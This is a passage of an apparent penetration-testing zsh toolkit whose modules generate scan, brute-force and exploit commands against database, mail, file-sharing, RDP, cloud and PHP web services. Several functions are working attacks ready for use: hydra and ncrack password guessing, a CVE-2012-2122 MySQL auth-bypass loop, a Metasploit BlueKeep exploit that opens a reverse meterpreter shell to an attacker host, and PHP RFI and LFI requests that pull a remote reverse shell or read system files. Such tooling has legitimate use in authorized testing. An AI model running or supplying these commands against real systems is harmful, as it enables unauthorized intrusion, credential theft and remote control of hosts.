    __pkgs tcpdump nmap sqsh impacket-scripts hydra
}

qq-enum-mssql-nmap-sweep() {
    __check-project
    qq-vars-set-network
    print -z "sudo nmap -n -Pn -sS -sU -p T:1433,U:1434 ${__NETWORK} -oA $(__netpath)/mssql-sweep"
}

qq-enum-mssql-tcpdump() {
    __check-project
    qq-vars-set-iface
    qq-vars-set-rhost
    print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 1433 -w $(__hostpath)/mssql.pcap"
}

qq-enum-mssql-sqsh() {
    __check-project
    qq-vars-set-rhost
    __check-user
    print -z "sqsh -S ${__RHOST} -U ${__USER}"
}

qq-enum-mssql-impacket-client() {
    qq-vars-set-rhost
    __check-user
    local db && __askvar db DATABASE
    # impacket-scripts (installed above) provides the wrapper, so no path to the .py is needed
    print -z "impacket-mssqlclient ${__USER}@${__RHOST} -db ${db} -windows-auth "
}

qq-enum-mssql-hydra() {
    __check-project
    qq-vars-set-rhost
    __check-user
    print -z "hydra -l ${__USER} -P ${__PASSLIST} -e nsr -o $(__hostpath)/mssql-hydra-brute.txt ${__RHOST} mssql"
}

================================================
FILE: modules/qq-enum-mysql.zsh
================================================
#!/usr/bin/env zsh

#############################################################
# qq-enum-mysql
#############################################################

qq-enum-mysql-help() {
    cat << "DOC"
qq-enum-mysql
-------------
The qq-enum-mysql namespace contains commands for scanning and enumerating mysql server services and databases.

Commands
--------
qq-enum-mysql-install:        installs dependencies
qq-enum-mysql-nmap-sweep:     scan a network for services
qq-enum-mysql-tcpdump:        capture traffic to and from a host
qq-enum-mysql-client:         connect using the mysql client
qq-enum-mysql-auth-bypass:    attempt auth bypass
qq-enum-mysql-hydra:          brute force passwords for a user account

DOC
}

qq-enum-mysql-install() {
    __info "Running $0..."
    # the command-line client is packaged as default-mysql-client on Kali/Debian
    __pkgs tcpdump nmap default-mysql-client
}

qq-enum-mysql-nmap-sweep() {
    __check-project
    qq-vars-set-network
    print -z "sudo nmap -n -Pn -sS -p 3306 ${__NETWORK} -oA $(__netpath)/mysql-sweep"
}

qq-enum-mysql-tcpdump() {
    __check-project
    qq-vars-set-iface
    qq-vars-set-rhost
    print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 3306 -w $(__hostpath)/mysql.pcap"
}

qq-enum-mysql-client(){
    qq-vars-set-rhost
    __check-user
    print -z "mysql -u ${__USER} -p -h ${__RHOST}"
}

qq-enum-mysql-auth-bypass() {
    qq-vars-set-rhost
    # CVE-2012-2122: a vulnerable build accepts a wrong password roughly once
    # in 256 attempts, so keep retrying; on success the loop drops into a mysql shell
    __info "CVE-2012-2122"
    print -z "for i in {1..1000}; do mysql -u root --password=bad -h ${__RHOST} 2>/dev/null; done"
}

qq-enum-mysql-hydra() {
    __check-project
    qq-vars-set-rhost
    __check-user
    local db && __prefill db DATABASE mysql
    print -z "hydra -l ${__USER} -P ${__PASSLIST} -e nsr -o $(__hostpath)/mysql-hydra-brute.txt ${__RHOST} mysql ${db}"
}

================================================
FILE: modules/qq-enum-network.zsh
================================================
#!/usr/bin/env zsh

#############################################################
# qq-enum-network
#############################################################

qq-enum-network-help() {
    cat << "DOC"
qq-enum-network
-------------
The qq-enum-network namespace contains commands for scanning and enumerating a network.

Commands
--------
qq-enum-network-install:              installs dependencies
qq-enum-network-tcpdump:              capture traffic to and from a network
qq-enum-network-tcpdump-bcasts:       capture ethernet broadcasts and multi-cast traffic
qq-enum-network-nmap-ping-sweep:      sweep a network with ping requests
qq-enum-network-nmap-syn-sweep:       sweep a network with TCP syn requests, top 1000 ports
qq-enum-network-nmap-udp-sweep:       sweep a network with UDP requests, top 100 ports
qq-enum-network-nmap-all-sweep:       sweep a network with TCP syn requests, all ports
qq-enum-network-nmap-discovery:       sweep a network with TCP syn requests and scripts, top 100 ports
qq-enum-network-masscan-top:          sweep a network with TCP requests, uses $__TCP_PORTS global var
qq-enum-network-masscan-windows:      sweep a network for common Windows ports
qq-enum-network-masscan-linux:        sweep a network for common Linux ports
qq-enum-network-masscan-web:          sweep a network for common web server ports

DOC
}

qq-enum-network-install() {
    __info "Running $0..."
    __pkgs tcpdump nmap masscan
}

qq-enum-network-tcpdump() {
    __check-project
    qq-vars-set-iface
    qq-vars-set-network
    print -z "sudo tcpdump -i ${__IFACE} net ${__NETWORK} -w $(__netpath)/network.pcap"
}

qq-enum-network-tcpdump-bcasts() {
    __check-project
    qq-vars-set-iface
    # a frame is either broadcast or multicast, never both, so the filter is "or"
    print -z "sudo tcpdump -i ${__IFACE} 'ether broadcast or ether multicast' -w $__PROJECT/networks/bcasts.pcap"
}

qq-enum-network-nmap-ping-sweep() {
    __check-project
    qq-vars-set-network
    print -z "nmap -vvv -sn --open ${__NETWORK} -oA $(__netpath)/nmap-ping-sweep"
}

qq-enum-network-nmap-syn-sweep() {
    __check-project
    qq-vars-set-network
    # top 1000 ports, as described in the help text
    print -z "sudo nmap -vvv -n -Pn -sS --open --top-ports 1000 ${__NETWORK} -oA $(__netpath)/nmap-syn-sweep"
}

qq-enum-network-nmap-udp-sweep() {
    __check-project
    qq-vars-set-network
    print -z "sudo nmap -vvv -n -Pn -sU --open --top-ports 100 ${__NETWORK} -oA $(__netpath)/nmap-udp-sweep"
}

qq-enum-network-nmap-all-sweep() {
    __check-project
    qq-vars-set-network
    print -z "sudo nmap -vvv -n -Pn -T4 --open -sS -p- ${__NETWORK} -oA $(__netpath)/nmap-all-sweep"
}

qq-enum-network-nmap-discovery() {
    __check-project
    qq-vars-set-network
    print -z "nmap -vvv -n -Pn -sV -sC --top-ports 100 ${__NETWORK} -oA $(__netpath)/nmap-discovery"
}

qq-enum-network-masscan-top() {
    __check-project
    qq-vars-set-network
    print -z "sudo masscan ${__NETWORK} -p${__TCP_PORTS} -oL $(__netpath)/masscan-top.txt"
}

qq-enum-network-masscan-windows() {
    __check-project
    qq-vars-set-network
    print -z "sudo masscan ${__NETWORK} -p135-139,445,3389,389,636,88 -oL $(__netpath)/masscan-windows.txt"
}

qq-enum-network-masscan-linux() {
    __check-project
    qq-vars-set-network
    print -z "sudo masscan ${__NETWORK} -p22,111,2222 -oL $(__netpath)/masscan-linux.txt"
}

qq-enum-network-masscan-web() {
    __check-project
    qq-vars-set-network
    print -z "sudo masscan ${__NETWORK} -p80,800,8000,8080,8888,443,4433,4443 -oL $(__netpath)/masscan-web.txt"
}

================================================
FILE: modules/qq-enum-nfs.zsh
================================================
#!/usr/bin/env zsh

#############################################################
# qq-enum-nfs
#############################################################

qq-enum-nfs-help() {
    cat << "DOC"
qq-enum-nfs
-----------
The qq-enum-nfs namespace contains commands for scanning and enumerating NFS services.

Commands
--------
qq-enum-nfs-install:       installs dependencies
qq-enum-nfs-nmap-sweep:    scan a network for services
qq-enum-nfs-tcpdump:       capture traffic to and from a host
qq-enum-nfs-show:          show remote NFS shares
qq-enum-nfs-mount:         mount a remote NFS share locally

DOC
}

qq-enum-nfs-install() {
    __info "Running $0..."
__pkgs tcpdump nmap nfs-common } qq-enum-nfs-nmap-sweep() { __check-project qq-vars-set-network print -z "sudo nmap -n -Pn -sS -sU -p U:111,T:111,U:2049,T:2049 ${__NETWORK} -oA $(__netpath)/nfs-sweep" } qq-enum-nfs-tcpdump() { __check-project qq-vars-set-iface qq-vars-set-rhost print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 111 and port 2049 -w $(__hostpath)/nfs.pcap" } qq-enum-nfs-show() { qq-vars-set-rhost print -z "showmount -e ${__RHOST}" } qq-enum-nfs-mount() { qq-vars-set-rhost local share && __askvar share SHARE mkdir -p /mnt/${share} print -z "mount -t nfs ${__RHOST}:/${share} /mnt/${share} -o nolock" } ================================================ FILE: modules/qq-enum-oracle.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-enum-oracle ############################################################# qq-enum-oracle-help() { cat << "DOC" qq-enum-oracle --------------s The qq-enum-oracle namespace contains commands for scanning and enumerating Oracle services and databases. Commands -------- qq-enum-oracle-install: installs dependencies qq-enum-oracle-nmap-sweep: scan a network for services qq-enum-oracle-tcpdump: capture traffic to and from a host qq-enum-oracle-sqlplus: sqlplus client qq-enum-oracle-odat: odat anonymous enumeration qq-enum-oracle-odat-creds: odat authenticated enumeration qq-enum-oracle-odat-passwords: odat password brute qq-enum-oracle-version: tnscmd version query qq-enum-oracle-status: tnscmd status query qq-enum-oracle-sidguess: tnscmd password brute force qq-enum-oracle-oscanner: oscanner enumeration qq-enum-oracle-hydra-listener: brute force passwords qq-enum-oracle-hydra-sid: brute force passwords DOC } qq-enum-oracle-install() { __info "Running $0..." 
__pkgs tcpdump nmap odat tnscmd10g sidguess oscanner hydra __pkgs oracle-instantclient-sqlplus sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf"; sudo ldconfig } qq-enum-oracle-nmap-sweep() { __check-project qq-vars-set-network print -z "sudo nmap -n -Pn -sS -p 1521 ${__NETWORK} -oA $(__netpath)/oracle-sweep" } qq-enum-oracle-tcpdump() { __check-project qq-vars-set-iface qq-vars-set-rhost print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 1521 -w $(__hostpath)/oracle.pcap" } qq-enum-oracle-sqlplus() { qq-vars-set-rhost local sid && __askvar sid "SID(DATABASE)" local u && __askvar u "USER" local p && __askvar [u] "PASSWORD" print -z "sqlplus ${u}/${p}@${__RHOST}:1521/${sid} as sysdba" } qq-enum-oracle-odat() { qq-vars-set-rhost print -z "odat all -s ${__RHOST}" } qq-enum-oracle-odat-creds() { qq-vars-set-rhost local sid && __askvar sid "SID(DATABASE)" local u && __askvar u "USER" local p && __askvar [u] "PASSWORD" print -z "odat all -s ${__RHOST} -p 1521 -d ${sid} -U ${u} -P ${p}" } qq-enum-oracle-odat-passwords() { qq-vars-set-rhost local sid && __askvar sid "SID(DATABASE)" __info "cat /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt | sed -e "s/[[:space:]]/\\\/g"" print -z "odat passwordguesser -s ${__RHOST} -d ${sid} --accounts-file accounts.txt" } qq-enum-oracle-version(){ qq-vars-set-rhost print -z "tnscmd10g version -h ${__RHOST}" } qq-enum-oracle-status(){ qq-vars-set-rhost print -z "tnscmd10g status -h ${__RHOST}" } qq-enum-oracle-sidguess(){ qq-vars-set-rhost print -z "sidguess host=${__RHOST} port=1521 sidfile=sid.txt" } qq-enum-oracle-oscanner() { qq-vars-set-rhost print -z "oscanner -s ${__RHOST}" } qq-enum-oracle-hydra-listener() { __check-project qq-vars-set-rhost __check-user print -z "hydra -l ${__USER} -P ${__PASSLIST} -e -o $(__hostpath)/oracle-listener-hydra-brute.txt ${__RHOST} Oracle Listener" } qq-enum-oracle-hydra-sid() { __check-project qq-vars-set-rhost 
__check-user print -z "hydra -l ${__USER} -P ${__PASSLIST} -e -o $(__hostpath)/oracle-sid-hydra-brute.txt ${__RHOST} Oracle Sid" } ================================================ FILE: modules/qq-enum-pop3.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-enum-pop3 ############################################################# qq-enum-pop3-help() { cat << "DOC" qq-enum-pop3 ------------ The qq-enum-pop3 namespace contains commands for scanning and enumerating POP3 email services. Commands -------- qq-enum-pop3-install: installs dependencies qq-enum-pop3-nmap-sweep: scan a network for services qq-enum-pop3-tcpdump: capture traffic to and from a host qq-enum-pop3-hydra: brute force passwords for a user account DOC } qq-enum-pop3-install() { __info "Running $0..." __pkgs nmap tcpdump hydra } qq-enum-pop3-nmap-sweep() { __check-project qq-vars-set-network print -z "sudo nmap -n -Pn -sS -p 110,995 ${__NETWORK} -oA $(__netpath)/pop3-sweep" } qq-enum-pop3-tcpdump() { __check-project qq-vars-set-iface qq-vars-set-rhost print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 110 and port 995 -w $(__hostpath)/pop3.pcap" } qq-enum-pop3-hydra() { __check-project qq-vars-set-rhost __check-user print -z "hydra -l ${__USER} -P ${__PASSLIST} -e -o $(__hostpath)/pop3-hydra-brute.txt ${__RHOST} POP3" } ================================================ FILE: modules/qq-enum-rdp.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-enum-rdp ############################################################# qq-enum-rdp-help() { cat << "DOC" qq-enum-rdp ------------ The qq-enum-rdp namespace contains commands for scanning and enumerating RDP remote desktop services. 
Commands -------- qq-enum-rdp-install: installs dependencies qq-enum-rdp-nmap-sweep: scan a network for services qq-enum-rdp-tcpdump: capture traffic to and from a host qq-enum-rdp-ncrack: brute force passwords for a user account qq-enum-rdp-bluekeep: bluekeep exploit reference qq-enum-rdp-msf-bluekeep-scan: bluekeep metasploit scanner qq-enum-rdp-msf-bluekeep-exploit: bluekeep metasploit exploit DOC } qq-enum-rdp-install() { __info "Running $0..." __pkgs nmap tcpdump ncrack metasploit-framework } qq-enum-rdp-nmap-sweep() { __check-project qq-vars-set-network print -z "nmap -n -Pn -sS -p3389 ${__NETWORK} -oA $(__netpath)/rdp-sweep" } qq-enum-rdp-tcpdump() { __check-project qq-vars-set-iface qq-vars-set-rhost print -z "tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 3389 -w $(__hostpath)/rdp.pcap" } qq-enum-rdp-ncrack() { __check-project qq-vars-set-rhost __check-user print -z "ncrack -vv --user ${__USER} -P ${__PASSLIST} rdp://${__RHOST} -oN $(__hostpath)/ncrack-rdp.txt " } qq-enum-rdp-bluekeep() { __info "https://sploitus.com/exploit?id=EDB-ID:47683" print -z "searchsploit bluekeep" } qq-enum-rdp-msf-bluekeep-scan() { __check-project qq-vars-set-rhost local cmd="use auxiliary/scanner/rdp/cve_2019_0708_bluekeep; set RHOSTS ${__RHOST}; run; exit" print -z "msfconsole -n -q -x \" ${cmd} \" | tee $(__hostpath/bluekeep-scan.txt)" } qq-enum-rdp-msf-bluekeep-exploit() { qq-vars-set-rhost qq-vars-set-lhost qq-vars-set-lport #__warn "Start a handler using on ${__LHOST}:${__LPORT} before proceeding" __msf << VAR use windows/rdp/cve_2019_0708_bluekeep_rce; set RHOSTS ${__RHOST}; set PAYLOAD windows/x64/meterpreter/reverse_https; set stagerverifysslcert true; set HANDLERSSLCERT ${__SHELL_SSL_CERT}; set LHOST ${__LHOST}; set LPORT ${__LPORT}; run; exit VAR } ================================================ FILE: modules/qq-enum-smb.zsh ================================================ #!/usr/bin/env zsh ############################################################# # 
qq-enum-smb ############################################################# qq-enum-smb-help() { cat << "DOC" qq-enum-smb ------------ The qq-enum-smb namespace contains commands for scanning and enumerating smb services. Commands -------- qq-enum-smb-install: installs dependencies qq-enum-smb-nmap-sweep: scan a network for services qq-enum-smb-tcpdump: capture traffic to and from a host qq-enum-smb-null-smbmap: query with smbmap null session qq-enum-smb-user-smbmap: query with smbmap authenticated session qq-enum-smb-null-enum4: enumerate with enum4linux qq-enum-smb-null-smbclient-list: list shares with a null session qq-enum-smb-null-smbclient-connect: connect with a null session qq-enum-smb-user-smbclient-connect: connect with an authenticated session qq-enum-user-smb-mount: mount an SMB share qq-enum-smb-samrdump: dump info using impacket qq-enum-smb-responder: spoof and get responses using responder qq-enum-smb-net-use-null: print a net use statement for windows qq-enum-smb-nbtscan: scan a local network qq-enum-smb-rpcclient: use rcpclient for queries DOC } qq-enum-smb-install() { __info "Running $0..." 
__pkgs nmap tcpdump smbmap enum4linux smbclient impacket-scripts responder nbtscan rpcclient } qq-enum-smb-nmap-sweep() { __check-project qq-vars-set-network print -z "nmap -n -Pn -sS -sU -p445,137-139 ${__NETWORK} -oA $(__netpath)/smb-sweep" } qq-enum-smb-tcpdump() { __check-project qq-vars-set-iface qq-vars-set-rhost print -z "tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 445 -w $(__hostpath)/smb.pcap" } qq-enum-smb-null-smbmap() { qq-vars-set-rhost print -z "smbmap -H ${__RHOST}" } qq-enum-smb-user-smbmap() { qq-vars-set-rhost __check-user __info "Usage with creds: -u -p -d " print -z "smbmap -u ${__USER} -H ${__RHOST}" } qq-enum-smb-null-enum4() { qq-vars-set-rhost print -z "enum4linux -a ${__RHOST} | tee $(__hostpath)/enum4linux.txt " } qq-enum-smb-null-smbclient-list() { qq-vars-set-rhost print -r -z "smbclient -L \\\\\\\\${__RHOST} -N " } qq-enum-smb-null-smbclient-connect() { qq-vars-set-rhost __check-share print -r -z "smbclient \\\\\\\\${__RHOST}\\\\${__SHARE} -N " } qq-enum-smb-user-smbclient-connect() { qq-vars-set-rhost __check-user __check-share print -r -z "smbclient \\\\\\\\${__RHOST}\\\\${__SHARE} -U ${__USER} " } qq-enum-user-smb-mount() { qq-vars-set-rhost __check-user local p && __askvar p PASSWORD __check-share print -z "mount //${__RHOST}/${__SHARE} /mnt/${__SHARE} -o username=${__USER},password=${p}" } qq-enum-smb-samrdump() { qq-vars-set-rhost print -z "python3 ${__IMPACKET}/samrdump.py ${__RHOST}" } qq-enum-smb-responder() { qq-vars-set-iface print -z "responder -I ${__IFACE} -A" } qq-enum-smb-net-use-null() { qq-vars-set-rhost __info "net use \\\\\\\\${__RHOST}\\IPC$ \"\" /u:\"\" " } qq-enum-smb-nbtscan() { qq-vars-set-network print -z "nbtscan ${__NETWORK}" } qq-enum-smb-rpcclient() { qq-vars-set-rhost print -z "rpcclient -U \" \" ${__RHOST}" } ================================================ FILE: modules/qq-enum-web-aws.zsh ================================================ #!/usr/bin/env zsh 
############################################################# # qq-enum-web-aws ############################################################# qq-enum-web-aws-help() { cat << "DOC" qq-enum-web-aws --------------- The qq-enum-web-aws namespace contains commands for scanning and enumerating AWS hosted services. Commands -------- qq-enum-web-aws-install: installs dependencies qq-enum-web-aws-s3-ls: use the awscli to list files in an S3 bucket qq-enum-web-aws-s3-write: use the awscli to copy a local file to an S3 bucket qq-enum-web-aws-s3-scanner: scan a list of buckets DOC } qq-enum-web-aws-install() { __info "Running $0..." __pkgs awscli qq-install-s3scanner } qq-enum-web-aws-s3-ls() { qq-vars-set-rhost print -z "aws s3 ls s3://${__RHOST} --recursive" } qq-enum-web-aws-s3-write() { qq-vars-set-rhost __ask "Select a file to copy to the S3 bucket" local f && __askpath f FILE $(pwd) print -z "aws s3 cp \"${f}\" s3://${__RHOST}" } qq-enum-web-aws-s3-scanner() { __ask "Select a file that contains a list of S3 buckets" local f && __askpath f FILE $(pwd) __info "Use -d to dump buckets to local path" print -z "python3 ${__TOOLS}/S3Scanner/s3scanner.py ${f}" } ================================================ FILE: modules/qq-enum-web-dirs.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-enum-web-dirs ############################################################# qq-enum-web-dirs-help() { cat << "DOC" qq-enum-web-dirs ---------------- The qq-enum-web-dirs namespace contains commands for discovering web content, directories and files. 
Commands -------- qq-enum-web-dirs-install: installs dependencies qq-enum-web-dirs-robots: get robots.txt using curl qq-enum-web-dirs-parsero: parse complex robots.txt with parsero qq-enum-web-dirs-wfuzz: brute force dirs and files with wfuzz qq-enum-web-dirs-ffuf: brute force dirs and files with ffuf qq-enum-web-dirs-gobuster: brute force dirs and files with gobuster DOC } qq-enum-web-dirs-install() { __info "Running $0..." __pkgs parsero gobuster wfuzz curl seclists wordlists qq-install-golang go get -u github.com/ffuf/ffuf go get -v -u github.com/tomnomnom/httprobe } qq-enum-web-dirs-robots() { __check-project qq-vars-set-url print -z "curl -s -L --user-agent \"${__UA}\" \"${__URL}/robots.txt\" | tee $(__urlpath)/robots.txt" } qq-enum-web-dirs-parsero() { __check-project qq-vars-set-url print -z "parsero -u \"${__URL}\" -o -sb | tee $(__urlpath)/robots.txt" } qq-enum-web-dirs-wfuzz() { __check-project qq-vars-set-url qq-vars-set-wordlist local d && __askvar d "RECURSION DEPTH" print -z "wfuzz -s 0.1 -R${d} --hc=404 -w ${__WORDLIST} ${__URL}/FUZZ --oF $(__urlpath)/wfuzz-dirs.txt" } qq-enum-web-dirs-ffuf() { __check-project qq-vars-set-url qq-vars-set-wordlist __check-threads local d && __askvar d "RECURSION DEPTH" print -z "ffuf -p 0.1 -t ${__THREADS} -recursion -recursion-depth ${d} -H \"User-Agent: Mozilla\" -fc 404 -w ${__WORDLIST} -u ${__URL}/FUZZ -o $(__urlpath)/ffuf-dirs.csv -of csv" } qq-enum-web-dirs-gobuster() { __check-project qq-vars-set-url qq-vars-set-wordlist __check-threads print -z "gobuster dir -u ${__URL} -a \"${__UA}\" -t1 -k -w ${__WORDLIST} | tee $(__urlpath)/gobuster-dirs.txt " } ================================================ FILE: modules/qq-enum-web-eslastic.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-enum-web-elastic ############################################################# qq-enum-web-elastic-help() { cat << "DOC" qq-enum-web-elastic 
------------------- The qq-enum-web-elastic namespace contains commands for scanning and enumerating elastic search services. Commands -------- qq-enum-web-elastic-install: installs dependencies qq-enum-web-elastic-nmap: scan the target using the elasticsearch nmap nse script qq-enum-web-elastic-health: query the target using curl for cluster health qq-enum-web-elastic-indices: query the target using curl for indices qq-enum-web-elastic-search: query an index using curl qq-enum-web-elastic-all: query for 1000 records in an index using curl DOC } qq-enum-web-elastic-install() { __info "Running $0..." __pkgs nmap curl qq-install-nmap-elasticsearch-nse } qq-enum-web-elastic-nmap() { __check-project qq-vars-set-rhost print -z "sudo nmap -n -Pn -p9200 --script=elasticsearch ${__RHOST} -oN $(__hostpath)/nmap-elastic.txt" } qq-enum-web-elastic-health() { qq-vars-set-url print -z "curl -A \"${__UA}\" -XGET \"${__URL}:9200/_cluster/health?pretty\"" } qq-enum-web-elastic-indices() { qq-vars-set-url print -z "curl -A \"${__UA}\" -XGET \"${__URL}:9200/_cat/indices?v\"" } qq-enum-web-elastic-search() { qq-vars-set-url local i && __askvar i "INDEX" __ask "Enter a query, such as *:password" local q && __askvar q "QUERY" print -z "curl -A \"${__UA}\" -XGET \"${__URL}:9200/${i}/_search?q=${q}&size=10&pretty\"" } qq-enum-web-elastic-all() { __check-project qq-vars-set-url local i && __askvar i "INDEX" print -z "curl -A \"${__UA}\" -XGET \"${__URL}:9200/${i}/_search?size=1000\" | tee $(__urlpath)/elastic-docs.json" } ================================================ FILE: modules/qq-enum-web-fuzz.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-enum-web-fuzz ############################################################# qq-enum-web-fuzz-help() { cat << "DOC" qq-enum-web-fuzz -------------- The qq-enum-web-fuzz namespace contains commands for fuzzing inputs of web applications Commands -------- 
qq-enum-web-fuzz-install: installs dependencies qq-enum-web-fuzz-auth-basic-payloads: generate base64 encoded credentials qq-enum-web-fuzz-auth-basic-ffuf: brute force basic auth qq-enum-web-fuzz-auth-json-ffuf: brute force basic auth with json post qq-enum-web-fuzz-auth-post-ffuf: brute force auth with post qq-enum-web-fuzz-auth-post-wfuzz: brute force auth with post qq-enum-web-brute-hydra-get: brute force auth with get qq-enum-web-brute-hydra-form-post: brute force auth with post DOC } qq-enum-web-fuzz-install() { __info "Running $0..." __pkgs seclists wordlists wfuzz hydra qq-install-golang go get -u github.com/ffuf/ffuf } qq-enum-web-fuzz-auth-basic-payloads() { qq-vars-set-wordlist __check-user print -z "file=\"${f}\"; while IFS= read line; do; echo -n \"${__USER}:\$line\" | base64 ; done <\"\$file\" > payloads.b64" } # ffuf qq-enum-web-fuzz-auth-basic-ffuf() { qq-vars-set-url __ask "Select file containing authorization header payloads" local f && __askpath f FILE $(pwd) __check-threads print -z "ffuf -t ${__THREADS} -p \"0.1\" -w ${f} -H \"Authorization: Basic FUZZ\" -fc 401 -u ${__URL} " } qq-enum-web-fuzz-auth-json-ffuf() { qq-vars-set-url __check-threads print -z "ffuf -t ${__THREADS} -p \"0.1\" -w /usr/share/seclists/Fuzzing/Databases/NoSQL.txt -u ${__URL} -X POST -H \"Content-Type: application/json\" -d '{\"username\": \"FUZZ\", \"password\": \"FUZZ\"}' -fr \"error\" " } qq-enum-web-fuzz-auth-post-ffuf() { qq-vars-set-url local uf && __askvar uf USER_FIELD local uv && __askvar uv USER_VALUE local pf && __askvar pf PASSWORD_FIELD __check-threads print -z "ffuf -t ${__THREADS} -p \"0.1\" -w ${__PASSLIST} -H \"Content-Type: application/x-www-form-urlencoded\" -X POST -d \"${uf}=${uv}&${pf}=FUZZ\" -u ${__URL} -fs 75 " } # wfuzz qq-enum-web-fuzz-auth-post-wfuzz() { qq-vars-set-url local uf && __askvar uf USER_FIELD local uv && __askvar uv USER_VALUE local pf && __askvar pf PASSWORD_FIELD print -z "wfuzz -c -w ${__PASSLIST} -d \"${uf}=${uv}&${pf}=FUZZ\" --sc 
302 ${__URL}" } qq-enum-web-brute-hydra-get() { qq-vars-set-rhost __check-user __ask "Enter the URI for the get request, ex: /path" local uri && __askvar uri URI print -z "hydra -l ${__USER} -P ${__PASSLIST} ${__RHOST} http-get ${uri}" } qq-enum-web-brute-hydra-form-post() { qq-vars-set-rhost __ask "Enter the URI for the post request, ex: /path" local uri && __askvar uri URI local uf && __askvar uf USER_FIELD local uv && __askvar uv USER_VALUE local pf && __askvar pf PASSWORD_FIELD __ask "Enter the response value to check for failure" local fm && __askvar fm FAILURE print -z "hydra ${__RHOST} http-form-post \"${uri}:${uf}=^USER^&${pf}=^PASS^:${fm}\" -l ${uv} -P ${__PASSLIST} -t 10 -w 30 " } ================================================ FILE: modules/qq-enum-web-js.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-enum-web-js ############################################################# qq-enum-web-js-help() { cat << "DOC" qq-enum-web-js -------------- The qq-enum-web-js namespace contains commands for enumerating javascript files and mining for urls and secrets. Commands -------- qq-enum-web-js-install: installs dependencies qq-enum-web-js-beautify: beautify JS file qq-enum-web-js-link-finder-url: run linkfinder on a file qq-enum-web-js-link-finder-domain: run linkfinder on all files of a site qq-enum-web-js-curl: enumerate links using curl DOC } qq-enum-web-js-install() { __info "Running $0..." 
__pkgs jsbeautifier qq-install-link-finder qq-install-node npm i -g eslint } qq-enum-web-js-beautify() { local f && __askpath f FILE $(pwd) print -z "js-beautify ${f} > source-$(basename ${f})" } qq-enum-web-js-link-finder-url() { __check-project __ask "Set the URL of a javascript file" qq-vars-set-url print -z "python3 linkfinder.py -i ${__URL} -o $(__urlpath)/js-links.html" } qq-enum-web-js-link-finder-domain() { __check-project qq-vars-set-url print -z "python3 linkfinder.py -i ${__URL} -d -o $(__urlpath)/js-links-all.html" } qq-enum-web-js-curl() { qq-vars-set-url curl -Lks ${__URL} | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=${__URL} '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"'##### %\";curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"('#####.*)|(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\" | sort -fu" | tr -d "'\"" } ================================================ FILE: modules/qq-enum-web-php.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-enum-web-php ############################################################# qq-enum-web-php-help() { cat << "DOC" qq-enum-web-php ---------------- The qq-enum-web-php namespace contains commands for discovering web content, directories and files on PHP web servers Commands -------- qq-enum-web-php-install: installs dependencies qq-enum-web-php-ffuf: scan for PHP files qq-enum-web-php-rfi: exploit typical RFI params qq-enum-web-php-rfi-input qq-enum-web-php-lfi-proc-self-environ qq-enum-web-php-lfi-filter-resource qq-enum-web-php-lfi-zip-jpg-shell qq-enum-web-php-lfi-logfile qq-enum-web-php-gen-htaccess: generate an htaccess file qq-enum-web-php-phpinfo: generate phpinfo 
payload DOC } qq-enum-web-php-install() { __info "Running $0..." __pkgs curl seclists wordlists qq-install-golang go get -u github.com/ffuf/ffuf go get -v -u github.com/tomnomnom/httprobe } qq-enum-web-php-ffuf() { __check-project qq-vars-set-url qq-vars-set-wordlist __check-threads local d && __askvar d "RECURSION DEPTH" print -z "ffuf -p 0.1 -t ${__THREADS} -recursion -recursion-depth ${d} -H \"User-Agent: Mozilla\" -fc 404 -w ${__WORDLIST} -u ${__URL}/FUZZ -e ${__EXT_PHP} -o $(__urlpath)/ffuf-dirs-php.csv -of csv" } qq-enum-web-php-rfi() { __ask "URL should contain a URI like /page.php?rfi=" qq-vars-set-url __ask "PAYLOAD URL should contain reverse php shell" local p && __askvar p PAYLOAD_URL print -z "curl -k -v -XGET \"${__URL}${p}%00\" " } qq-enum-web-php-rfi-input() { __ask "URL should contain a URI like /page.php?rfi=" qq-vars-set-url print -z "curl -k -v -XPOST --data \"\" \"${__URL}php://input%00\" " } qq-enum-web-php-lfi-proc-self-environ() { __ask "URL should contain a URI like /page.php?lfi=" qq-vars-set-url print -z "curl -k -v -A \"\" \"${__URL}../../../proc/self/environ\" " } qq-enum-web-php-lfi-filter-resource(){ __ask "URL should contain a URI like /page.php?lfi=" qq-vars-set-url __ask "Set path to a remote file" local f && __askvar f REMOTE_FILE print -z "curl -k -v -XGET \"${__URL}php://filter/convert.base64-encode/resource=${f}\" " } qq-enum-web-php-lfi-zip-jpg-shell() { __ask "URL should contain a URI like /page.php?lfi=" qq-vars-set-url echo "
